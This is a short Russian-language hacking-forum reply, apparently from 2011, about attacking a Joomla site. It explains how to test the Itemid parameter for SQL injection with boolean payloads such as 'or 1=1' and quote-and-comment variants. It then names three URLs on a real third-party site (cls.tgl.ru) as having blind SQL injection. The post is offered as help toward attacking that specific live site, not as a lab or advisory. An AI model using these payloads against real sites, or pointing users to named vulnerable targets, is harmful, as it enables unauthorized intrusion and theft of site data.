25.04.2011, 17:37
|
|
Постоянный
Регистрация: 07.03.2011
Сообщений: 963
С нами:
7991606
Репутация:
37
|
|
Сообщение от Nightmarе
Itemid=1 страница 1.
Itemid=2-1 страница 2.
логично кажется.... тут SQL нет. ибо тогда в любой новости при смене ID в параметре новость бы менялась, но это не значит что это SQL
Проверяем SQL так:
Itemid=1+or+1=1
Itemid=1+or+1=2
Так страницы должны меняться. не меняются, значит запрос обрамлён в кавычки, пробуем так:
Itemid=1'+or+1=1+--+1
Itemid=1'+or+1=2+--+1
Не меняются страницы, значит SQL нету.
Здесь есть Blind
http://cls.tgl.ru/index.php?no_html=1&option=com_rss&feed=RSS2.0
http://cls.tgl.ru/index.php?Itemid=106&option=com_content&task=blogs ection&id=3
http://cls.tgl.ru/index.php?option=com_rss&feed=RSS0.91&no_html=1
|
|
|